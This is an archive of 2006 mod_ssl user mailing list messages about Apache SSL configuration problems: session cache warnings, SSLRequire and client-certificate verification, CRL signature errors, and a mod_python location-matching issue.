From: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?iso-8859-1?Q?L=2E_Steinbr=FCgger_-_Fa=2E_Rameder?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

It works's :)) thanks a lot =20

-----Urspr=FCngliche Nachricht-----
Von: Schaudt, Oliver [mailto:owner-modssl-users@modssl.org] Im Auftrag =
von Oliver.Schaudt@unilog.de
Gesendet: Mittwoch, 5. April 2006 16:56
An: modssl-users@modssl.org
Betreff: RE: Session Cache is not configured


Do you have some lines like
 or  before the sslcache entry =
?

I have to put this out of my ssl-config before it worked.

Greetings

Oliver



-----Urspr=FCngliche Nachricht-----
Von: owner-modssl-users@modssl.org im Auftrag von L. Steinbr=FCgger - =
Fa. Rameder
Gesendet: Mi 05.04.2006 16:45
An: modssl-users@modssl.org
Betreff: Session Cache is not configured
=20
Hallo,=20

I have a problem with APACHE MOD SSL. I installed Apache 2.2.0 at an =
Suse Linux System. The Server works fine, also with SSL, but in my SSL =
LOG the following Error Code is written :

ssl_error.log
-----------------------------------------
[warn] Init: Session Cache is not configured [hint: SSLSessionCache]
-----------------------------------------

I believe that the error is my ssl_global.conf but i found no further =
information in the internet ...

ssl_global.conf
----------------------------------------------------
SSLSessionCache         dbm:/var/log/apache2/ssl_cache
SSLSessionCacheTimeout  600
---------------------------------------------------

The following modules are installed

---------------------------------------------------
core_module (static)
mpm_prefork_module (static)
http_module (static)
so_module (static)
suexec_module (shared)
actions_module (shared)
alias_module (shared)
autoindex_module (shared)
cgi_module (shared)
dir_module (shared)
include_module (shared)
log_config_module (shared)
mime_module (shared)
negotiation_module (shared)
setenvif_module (shared)
status_module (shared)
userdir_module (shared)
asis_module (shared)
rewrite_module (shared)
ssl_module (shared)
vhost_alias_module (shared)
php5_module (shared)
authn_dbm_module (shared)
auth_basic_module (shared)
authz_groupfile_module (shared)
authz_host_module (shared)
authn_file_module (shared)
authz_user_module (shared)
authz_default_module (shared)
---------------------------------------------------


I hope that someone can help me :)

Lars Steinbr=FCgger
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 17:09:54 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 8668614D9F2; Wed,  5 Apr 2006 17:09:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pre-secure.de (mail.pre-secure.de [213.238.39.87])
	by master.modssl.org (Postfix) with ESMTP id 540B214D83E
	for ; Wed,  5 Apr 2006 17:09:53 +0200 (CEST)
Received: by mail.pre-secure.de (Postfix, from userid 2021)
	id 28DDB41C15E; Wed,  5 Apr 2006 17:09:47 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.pre-secure.de (Postfix) with ESMTP id 0DF5441C15C
	for ; Wed,  5 Apr 2006 17:09:47 +0200 (CEST)
Received: from mail.pre-secure.de ([127.0.0.1])
 by localhost (mail.pre-secure.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 08427-01 for ;
 Wed,  5 Apr 2006 17:09:43 +0200 (CEST)
Received: from imap.pre-secure.de (jin_b.pre-secure.de [192.168.0.75])
	by mail.pre-secure.de (Postfix) with ESMTP
	for ; Wed,  5 Apr 2006 17:09:43 +0200 (CEST)
Received: from [192.168.1.21] (p548E99C6.dip0.t-ipconnect.de [84.142.153.198])
	by imap.pre-secure.de (Postfix) with ESMTP id B52F739987
	for ; Wed,  5 Apr 2006 17:09:42 +0200 (CEST)
Message-ID: <4433DE30.5040303@pre-secure.de>
Date: Wed, 05 Apr 2006 17:11:44 +0200
From: Olaf Gellert 
Organization: PRESECURE Consulting GmbH
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl: SSLRequire
References: <9B4E37DCB8D57D408FF960B536F0E5274330FC@ms01012.avinci.de>
In-Reply-To: <9B4E37DCB8D57D408FF960B536F0E5274330FC@ms01012.avinci.de>
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at mail.pre-secure.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Oliver.Schaudt@unilog.de wrote:
> Perhaps
>   SSLVerifyClient require
> 
> Default is
>   SSLVerifyClient none

Good idea, but  this is set already (otherwise the
client would not authentify with the certificate)
for this virtual host. Moving it into the directory
section does not change anything either. And VerifyDepth
is set, too...

Olaf

-- 
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 17:42:00 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4734A14D97E; Wed,  5 Apr 2006 17:42:00 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail134.messagelabs.com (mail134.messagelabs.com [85.158.137.35])
	by master.modssl.org (Postfix) with SMTP id 0B11614D82F
	for ; Wed,  5 Apr 2006 17:41:59 +0200 (CEST)
X-VirusChecked: Checked
X-Env-Sender: Oliver.Schaudt@unilog.de
X-Msg-Ref: server-12.tower-134.messagelabs.com!1144251711!16267875!1
X-StarScan-Version: 5.5.9.1; banners=-,-,-
X-Originating-IP: [194.45.208.28]
Received: (qmail 2079 invoked from network); 5 Apr 2006 15:41:51 -0000
Received: from mail.unilog.de (HELO mail.unilog.de) (194.45.208.28)
  by server-12.tower-134.messagelabs.com with SMTP; 5 Apr 2006 15:41:51 -0000
Received: from ms01012.avinci.de
	([10.200.1.28])
	by mail.unilog.de; Wed, 05 Apr 2006 17:41:44 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="----_=_NextPart_001_01C658C8.1D71775A"
Subject: RE: mod_ssl: SSLRequire
Date: Wed, 5 Apr 2006 17:43:07 +0200
Message-ID: <9B4E37DCB8D57D408FF960B536F0E527433100@ms01012.avinci.de>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: <9B4E37DCB8D57D408FF960B536F0E527433100@ms01012.avinci.de>
Thread-Topic: mod_ssl: SSLRequire
Thread-Index: AcZYw87uPyFeG8ltQdKq0ZrNK+e9uQAA9Oy0
From: 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C658C8.1D71775A
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

=20
>Oliver.Schaudt@unilog.de wrote:
>> Perhaps
>>   SSLVerifyClient require
>>=20
>> Default is
>>   SSLVerifyClient none

>Good idea, but  this is set already (otherwise the
>client would not authentify with the certificate)
>for this virtual host. Moving it into the directory
>section does not change anything either. And VerifyDepth
>is set, too...

How deep is VerifyDepth ?=20

I know it will be a big file, but for this purposes i use to turn on
"LogLevel Debug" than the error_log will become very verbose.
There Apache will tell if your "testuser" will be checked or not .

>Olaf

bye

Oliver


--=20
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org


------_=_NextPart_001_01C658C8.1D71775A
Content-Type: application/ms-tnef;
	name="winmail.dat"
Content-Transfer-Encoding: base64

eJ8+IiIPAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy
b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEEgAEAGAAAAFJFOiBtb2Rfc3NsOiBTU0xS
ZXF1aXJlAAsIAQWAAwAOAAAA1gcEAAUAEQArAAcAAwAsAQEggAMADgAAANYHBAAFABEALgAhAAMA
SQEBCYABACEAAAA1QjY1N0RBNzE0MzM3NjQ5ODEzQ0U1NjI2OEEzMjk0MwDvBgEDkAYAVAoAADgA
AAADACYAAAAAAAMANgAAAAAAQAA5AM9ooaLHWMYBHgA9AAEAAAAFAAAAUkU6IAAAAAACAUcAAQAA
ADAAAABjPURFO2E9IDtwPUF2aW5jaTtsPU1TMDEwMTItMDYwNDA1MTU0NjMzWi0xMzQ5NwAeAEkA
AQAAABgAAABSZTogbW9kX3NzbDogU1NMUmVxdWlyZQBAAE4AALjdP8NYxgEeAFoAAQAAAB4AAABv
d25lci1tb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZwAAAAIBWwABAAAAWQAAAAAAAACBKx+kvqMQGZ1u
AN0BD1QCAAAAAG93bmVyLW1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnAFNNVFAAb3duZXItbW9kc3Ns
LXVzZXJzQG1vZHNzbC5vcmcAAAAAAgFcAAEAAAAjAAAAU01UUDpPV05FUi1NT0RTU0wtVVNFUlNA
TU9EU1NMLk9SRwAAHgBdAAEAAAANAAAAT2xhZiBHZWxsZXJ0AAAAAAIBXgABAAAAOwAAAAAAAACB
Kx+kvqMQGZ1uAN0BD1QCAAAAAE9sYWYgR2VsbGVydABTTVRQAG9nQHByZS1zZWN1cmUuZGUAAAIB
XwABAAAAFgAAAFNNVFA6T0dAUFJFLVNFQ1VSRS5ERQAAAB4AZgABAAAABQAAAFNNVFAAAAAAHgBn
AAEAAAAeAAAAb3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAAAAeAGgAAQAAAAUAAABTTVRQ
AAAAAB4AaQABAAAAEQAAAG9nQHByZS1zZWN1cmUuZGUAAAAAHgBwAAEAAAAUAAAAbW9kX3NzbDog
U1NMUmVxdWlyZQACAXEAAQAAABsAAAABxljDzu4/IV4byW1B0qrRms0r5725AAD07LQAHgB0AAEA
AAAYAAAAbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAHgAaDAEAAAAQAAAAU2NoYXVkdCwgT2xpdmVy
AB4AHQ4BAAAAFAAAAG1vZF9zc2w6IFNTTFJlcXVpcmUAAgEJEAEAAADPAwAAywMAAGAGAABMWkZ1
76gvjwMACgByY3BnMTI14jIDQ3RleAVBAQMB9/8KgAKkA+QHEwKAD/MAUARWPwhVB7IRJQ5RAwEC
AGNo4QrAc2V0MgYABsMRJfYzBEYTtzASLBEzCO8J97Y7GB8OMDURIgxgYwBQswsJAWQzNhZQC6Yg
CuNBCoA+T2xpdgSQLoJTE9F1ZHRAdQMByG9nLgEAIHcDYA6wYjodBT4gUASQE+BwhnMfZxzgU1NM
VgZyPHlDHYAJ8AVAGCBxdW5pGCAfZx9nRAEQHhBs7wVABAAgbyF4bgIgInUdBRxHbwRwJBABAGEs
IMRidQVAIHRoBAAkERogFBEgB0AYIGFkefQgKB8gaASQA/Ee4Clh1R0FYyG0dwhgbCcwJfC/KKEn
wClwAjAhcR7waSgAuSniIGMEkCwBDeBhDrBeKR0FAhAFwCgDdiJQdAJ1B0AgaG9zdC7lBdBvLqBu
ZyQQJAECMCpvLJNkIlFjMEByebcdBRQQMPBpAiAwoG8Hkd8rYhPRL8Ae4ABweSgBL8HuZSxhHbEQ
wG4nMCFEI6A9BTBoHQUoVCeQMEBvLvM2UCY6SG8H4AEANPAoQhk0iSA/HPUdBEkga68l8AfgL/ED
8GwDIGIzEc0noGkv0C0wbGUnlC4XGnAIcHAvMAeRaSB1PynCMFEIcAOgAiAdBCJMeR6gTGUdoAMg
I6AnsGc+IifxA5EsogSQA2ByX/8ekTo2BaAHgC6QBJApIB2htwbgFBA2dVQpcR7gQQqwPxPQHuE6
Ug6wOmEGkCB5uQhhICIOsC9APQFyPzDzOkZDAWNrCYA9sAXAK2KTNnsdYWFmJjpieSYrpx10Jjod
BC0tHPVEBSDQbC5Jbi4RbS9gR2I8IEdDoSzxJMFNDVBSYEVTRUNVTiApMFJvLZUGYAMABbFSB5An
cHL9QwFyJ5BQb1DDCFAAgCPh1S+yRwbQSB0EUC8gJhACOikwKzQ5KSAwdDcwFlAvTglQyB6gQPpw
GCAtMbEIcEHwAQAmOttQz1fVQTCgC3BsQXEIkL8H4DIBS7AOsASgKJFBAkDdANBrJDVX31u1aAJA
IEDQOi8vd11ALgWQAJD1ACAuWjEvFBAAgAWwWjG9JjpfX49gn2GvYr9fHQSfQtVZ4yPALOA9Mk9w
CfDXIREpMARhXwQQbFPQZp+vHvBdUQRhZlEuBbBnHQRmVUTBBgB1cDyATNFNe1kRL7JMBABM72rk
aAQt6USyc0BoDkEnwANxDrDnJzBqU2nQbmEzAAXAby/5a1lhagWwMjAEYGy/HQQCfXLwAB4ANRAB
AAAAOwAAADw5QjRFMzdEQ0I4RDU3RDQwOEZGOTYwQjUzNkYwRTUyNzQzMzEwMEBtczAxMDEyLmF2
aW5jaS5kZT4AAB4ARxABAAAADwAAAG1lc3NhZ2UvcmZjODIyAAALAPIQAQAAAB8A8xABAAAAQAAA
AFIARQAlADMAQQAgAG0AbwBkAF8AcwBzAGwAJQAzAEEAIABTAFMATABSAGUAcQB1AGkAcgBlAC4A
RQBNAEwAAAALAPYQAAAAAEAABzDPaKGix1jGAUAACDAXY30dyFjGAQMA3j+vbwAAAwDxPwcEAAAe
APg/AQAAABAAAABTY2hhdWR0LCBPbGl2ZXIAAgH5PwEAAABbAAAAAAAAANynQMjAQhAatLkIACsv
4YIBAAAAAAAAAC9PPUFWSU5DSS9PVT1GSVJTVCBBRE1JTklTVFJBVElWRSBHUk9VUC9DTj1SRUNJ
UElFTlRTL0NOPU0wNTQ3AAAeAPo/AQAAABUAAABTeXN0ZW0gQWRtaW5pc3RyYXRvcgAAAAACAfs/
AQAAAB4AAAAAAAAA3KdAyMBCEBq0uQgAKy/hggEAAAAAAAAALgAAAAMA/T/kBAAAAwAZQAAAAAAD
ABpAAAAAAAMAHUAAAAAAAwAeQAAAAAAeADBAAQAAAAYAAABNMDU0NwAAAB4AMUABAAAABgAAAE0w
NTQ3AAAAHgAyQAEAAAAeAAAAb3duZXItbW9kc3NsLXVzZXJzQG1vZHNzbC5vcmcAAAAeADNAAQAA
ABEAAABvZ0BwcmUtc2VjdXJlLmRlAAAAAB4AOEABAAAABgAAAE0wNTQ3AAAAHgA5QAEAAAACAAAA
LgAAAAMAdkD/////CwApAAAAAAALACMAAAAAAAMABhB9hHf7AwAHEOwCAAADABAQAQAAAAMAERAA
AAAAHgAIEAEAAABlAAAAT0xJVkVSU0NIQVVEVEBVTklMT0dERVdST1RFOlBFUkhBUFNTU0xWRVJJ
RllDTElFTlRSRVFVSVJFREVGQVVMVElTU1NMVkVSSUZZQ0xJRU5UTk9ORUdPT0RJREVBLEJVVFRI
SQAAAAACAX8AAQAAADsAAAA8OUI0RTM3RENCOEQ1N0Q0MDhGRjk2MEI1MzZGMEU1Mjc0MzMxMDBA
bXMwMTAxMi5hdmluY2kuZGU+AAAZnQ==

------_=_NextPart_001_01C658C8.1D71775A--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  5 19:28:16 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EC26F14D86D; Wed,  5 Apr 2006 19:28:16 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.pre-secure.de (mail.pre-secure.de [213.238.39.87])
	by master.modssl.org (Postfix) with ESMTP id B852814D83E
	for ; Wed,  5 Apr 2006 19:28:16 +0200 (CEST)
Received: by mail.pre-secure.de (Postfix, from userid 2021)
	id B3B4241C15E; Wed,  5 Apr 2006 19:28:09 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by mail.pre-secure.de (Postfix) with ESMTP id 9654941C15C
	for ; Wed,  5 Apr 2006 19:28:09 +0200 (CEST)
Received: from mail.pre-secure.de ([127.0.0.1])
 by localhost (mail.pre-secure.de [127.0.0.1]) (amavisd-new, port 10024)
 with ESMTP id 04118-18 for ;
 Wed,  5 Apr 2006 19:28:05 +0200 (CEST)
Received: from imap.pre-secure.de (jin_b.pre-secure.de [192.168.0.75])
	by mail.pre-secure.de (Postfix) with ESMTP
	for ; Wed,  5 Apr 2006 19:28:05 +0200 (CEST)
Received: from [192.168.1.21] (p548E99C6.dip0.t-ipconnect.de [84.142.153.198])
	by imap.pre-secure.de (Postfix) with ESMTP id 0B8C5278007
	for ; Wed,  5 Apr 2006 19:28:04 +0200 (CEST)
Message-ID: <4433FEA0.7000902@pre-secure.de>
Date: Wed, 05 Apr 2006 19:30:08 +0200
From: Olaf Gellert 
Organization: PRESECURE Consulting GmbH
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: mod_ssl: SSLRequire
References: <9B4E37DCB8D57D408FF960B536F0E527433100@ms01012.avinci.de>
In-Reply-To: <9B4E37DCB8D57D408FF960B536F0E527433100@ms01012.avinci.de>
X-Enigmail-Version: 0.91.0.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at mail.pre-secure.de
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Olaf Gellert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Oliver.Schaudt@unilog.de wrote:

> How deep is VerifyDepth ? 

I guess this is the wrong direction of error checking.
VerifDepth and VerifyRequire are used in evaluating the
certificate chain on SSL connection establishment, the
SSLRequire expression is evaluated after the HTTP request
is successfully transmitted and the server already knows
which webpage is requested (it's a "directory" section...)

Of course VerifyDepth is sufficient (every value above 2
works in my case, as expected), if it was not, the error
would be something like "unable to get issuer certificate",
because evaluation starts at the leaf (= client certificate)
going up to the root CA cer.

> I know it will be a big file, but for this purposes i use to turn on
> "LogLevel Debug" than the error_log will become very verbose.
> There Apache will tell if your "testuser" will be checked or not .

How would that look like? I see at the connection
establishment:

[Wed Apr 05 19:17:59 2006] [debug] ssl_engine_kernel.c(1228): Certificate Verification: depth: 2, subject: /C=DE/O=SSLTest Root CA/CN=SSLTest Root,
issuer: /C=DE/O=SSLTest Root CA/CN=SSLTest Root
[Wed Apr 05 19:17:59 2006] [debug] ssl_engine_kernel.c(1228): Certificate Verification: depth: 1, subject: /C=DE/O=SSLTest SubCA 01/CN=SSLTest SubCA
01, issuer: /C=DE/O=SSLTest Root CA/CN=SSLTest Root
[Wed Apr 05 19:17:59 2006] [debug] ssl_engine_kernel.c(1228): Certificate Verification: depth: 0, subject: /C=DE/O=SSLTest SubCA 01/OU=User
Certificates/CN=testuser2, issuer: /C=DE/O=SSLTest SubCA 01/CN=SSLTest SubCA 01

After many bytes of packet dump I see the HTTP request
arrived:

[Wed Apr 05 19:17:59 2006] [info] Initial (No.1) HTTPS request received for child 0 (server www.testserver.de:443)

and then again lots of bytes (the webpage that is delivered).
Nothing about the check of SSLRequire...

Thanx for your help anyways. :-)  I guess the next step
will be stracing the whole thing...

-- 
Dipl.Inform. Olaf Gellert                  PRESECURE (R)
Senior Researcher,                       Consulting GmbH
Phone: (+49) 0700 / PRESECURE           og@pre-secure.de

                        A daily view on Internet Attacks
                        https://www.ecsirt.net/sensornet

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  7 17:10:52 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 08BDE14D876; Fri,  7 Apr 2006 17:10:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from moutng.kundenserver.de (moutng.kundenserver.de [212.227.126.188])
	by master.modssl.org (Postfix) with ESMTP id BF82D14D833
	for ; Fri,  7 Apr 2006 17:10:51 +0200 (CEST)
Received: from [84.150.20.25] (helo=monet.painters.schwarz-online.com)
	by mrelayeu.kundenserver.de (node=mrelayeu7) with ESMTP (Nemesis),
	id 0ML2Dk-1FRsbY15wT-00036J; Fri, 07 Apr 2006 17:10:44 +0200
Received: from monet.painters.schwarz-online.com (schwarz@localhost [127.0.0.1])
	by monet.painters.schwarz-online.com (8.13.4/8.13.4/Debian-3) with ESMTP id k37FAU1B029011
	for ; Fri, 7 Apr 2006 17:10:30 +0200
Received: from localhost (schwarz@localhost)
	by monet.painters.schwarz-online.com (8.13.4/8.13.4/Submit) with ESMTP id k37FAUJs029008
	for ; Fri, 7 Apr 2006 17:10:30 +0200
X-Authentication-Warning: monet.painters.schwarz-online.com: schwarz owned process doing -bs
Date: Fri, 7 Apr 2006 17:10:30 +0200 (CEST)
From: Christian Schwarz 
To: modssl-users@modssl.org
Subject: CRL problem (bug?)
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
X-Provags-ID: kundenserver.de abuse@kundenserver.de login:f5f6e8c5f062720afc4addbd616448e2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Christian Schwarz 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hi!

I have a problem with apache2 running under Debian "sarge": I have two 
different CA keys, both having their own CRLs.

SSL-client-authentication against any of these keys fails with the message 
"Invalid signature on CRL".  However, checking the client certs against 
these CA keys directly with the "openssl" tool succeeds:

  # openssl verify -verbose -purpose sslclient  -CApath /etc/apache2/ssl \
       ~/client-key.pem
  client-key.pem: OK
  #

Both CA keys have the same "issuer" string.  Could this be a problem for 
mod_ssl?

Do you have any hints for me how to debug this problem?


Thanks,

Chris

--          _,,     Christian Schwarz
            / o \__   schwarz@schwarz-online.com
            !   ___;   C.Schwarz@schwarz-consulting.de, chris@zwart.de
            \  /
   \\\______/  !        PGP-fp: 8F 61 EB 6D CF 23 CA D7  34 05 14 5C C8 DC 22 BA
    \          /         http://schwarz-online.com
-.-.,---,-,-..---,-,-.,----.-.-
   "DIE ENTE BLEIBT DRAUSSEN!"
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr  7 17:59:20 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 09FB614D876; Fri,  7 Apr 2006 17:59:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from pproxy.gmail.com (pproxy.gmail.com [64.233.166.182])
	by master.modssl.org (Postfix) with ESMTP id 5B53F14D833
	for ; Fri,  7 Apr 2006 17:59:18 +0200 (CEST)
Received: by pproxy.gmail.com with SMTP id b29so536286pya
        for ; Fri, 07 Apr 2006 08:59:11 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=tinFp7Au5vs00ed1zhzdJXChvgaoeQfQiyF3PiP9FPCbdvkYrDTs3WFzYl+WBvAshseDdR8O6M0kIhE9jChc7Z7c7LJ2sIWtTssKWiUO/p2jMpw2rmw7Dcdc4VtM1Er++bR29X6Aa/vK6V/AgEM/3ITy2HG7Vfd/EFRiX7IIVkg=
Received: by 10.35.98.6 with SMTP id a6mr1146416pym;
        Fri, 07 Apr 2006 08:59:11 -0700 (PDT)
Received: by 10.35.95.19 with HTTP; Fri, 7 Apr 2006 08:59:11 -0700 (PDT)
Message-ID: <967dbda50604070859t4ea654a7kad7ce8996a6aa03@mail.gmail.com>
Date: Fri, 7 Apr 2006 11:59:11 -0400
From: ben 
To: modssl-users@modssl.org
Subject: Apache + mod_python + SSLVerifyClient == broken config / url application
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_1598_24914974.1144425551282"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: ben 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_1598_24914974.1144425551282
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I have unearthed a strange problem.  I have a simple httpd.conf that should
map urls like this:

/download -> static content, matching client SSL cert required
* -> mod_python handler, SSL based, but no client cert required

What I get instead is

https://foobar.com/download/stuff.txt -- static content, client cert
required
https://foobar.com/setup/things -- python handler, no client cert required
https://foobar.com/setup/download/stuff -- python handler, client cert
required

The last thing should never happen by the configuration:

---- httpd.conf ----
ServerName 127.0.0.1
ServerRoot "/usr/local"
DocumentRoot "/usr/local/htdocs"
Listen 443
User www
Group www
LoadModule python_module modules/mod_python.so


        SetHandler mod_python
        PythonHandler dummy::handler
        PythonDebug On



        SSLVerifyClient require
        SSLVerifyDepth 1
        SetHandler None


SSLEngine on
SSLCertificateFile    certs/dummy.crt
SSLCertificateKeyFile certs/dummy.crt
SSLCACertificateFile  certs/dummy-ca.crt
--------

This is running against apache 2.2.0, python 2.4.1 and mod_python 3.2.8 (+
the four patches found here -- needed for proper 2.2.0 operation --
http://svn.apache.org/viewcvs.cgi?rev=3D376544&view=3Drev )

Basically, any url that contains, but does not begin with '/download/',
falsely requires an SSL client cert, and produces an IOError in the python
during the write() call.

I've tried using "Directory" directive as well as LocationMatch
"^/download/".  Also I've used both 'SetHandler none' and 'SetHandler
default-handler'.  I've also tried this on linux 2.6.9 as well as mac os x
10.4.6.  All of these are equally broken.

Simple test python code is here:

---- dummy.py ----
from mod_python import apache

def handler(req):
    req.content_type =3D 'text/plain'
    try:
        req.write(str(req.the_request))
    except IOError, e:
        apache.log_error('IOError: ' + str(e))
        apache.log_error('IOError: ' + req.the_request)
    return apache.OK
--------

Below are the errors produced in apache's error log for each url, using a
client that does not have the client cert configured.

https://foobar.com/download/stuff.txt
[www_error] Re-negotiation handshake failed: Not accepted by client!?
[curl error] SSL read: error:14094410:SSL routines:SSL3_READ_BYTES:sslv3
alert handshake failure, errno 0

https://foobar.com/setup/things
[no errors]

https://foobar.com/setup/download/stuff
[www_error] IOError: Write failed, client closed connection.
[www_error] IOError: GET /foo/download HTTP/1.1
[curl error] SSL read: error:14094410:SSL routines:SSL3_READ_BYTES:sslv3
alert handshake failure, errno 0

Has anybody seen any problem like this?  I tried setting this up to fail w/
static content, but so far it only fails w/ mod_python + ssl.
The apache lists show a few other problems w/ the SSLVerifyClient directive=
,
so it may not be only mod_python that triggers this...


http://marc.theaimsgroup.com/?l=3Dapache-modssl&w=3D2&r=3D1&s=3DSSLVerifyCl=
ient&q=3Db

Semantically, it seems odd that the python intrepreter would even be
invoked, since the SSLVerifyClient ought to be part of the authentication
step, and should refuse the request before it even arrives.  In any case,
I'm completely befuddled.

ben

------=_Part_1598_24914974.1144425551282
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline

I have unearthed a strange problem.  I have a simple httpd.conf that s=
hould map urls like this:

/download -> static content, matching c=
lient SSL cert required
* -> mod_python handler, SSL based, but no cl=
ient cert required=20


What I get instead is 

https://foobar.com/download/stuff.txt -- static content, c=
lient cert required
https://=
foobar.com/setup/things
 -- python handler, no client cert required
https://foobar.com/setup/download/stuff -- =
python handler, client cert required

The last thing should never hap=
pen by the configuration:=20


---- httpd.conf ----
ServerName 127=
.0.0.1
ServerRoot "/usr/local"
DocumentRoot "/usr/=
local/htdocs"
Listen 443
User www
Group www
LoadModule pyt=
hon_module modules/mod_python.so=20


<Location "/">
     &nb=
sp;  SetHandler mod_python
      &nbs=
p; PythonHandler dummy::handler
      &nbs=
p; PythonDebug On
</Location>

<Location "/download&=
quot;>
        SSLVerifyClient req=
uire=20

        SSLVerifyDepth 1
 &n=
bsp;      SetHandler None
</Location>
=

SSLEngine on
SSLCertificateFile    certs/dummy.crtSSLCertificateKeyFile certs/dummy.crt
SSLCACertificateFile  certs/=
dummy-ca.crt
 
--------

This is running against apache 2.2.0, python 2.4.1 and=
 mod_python 3.2.8 (+ the four patches found here -- needed for proper 2.2.0=
 operation -- 
http://svn.apache.org/viewcvs.cgi?rev=3D376544&view=3Drev )

=
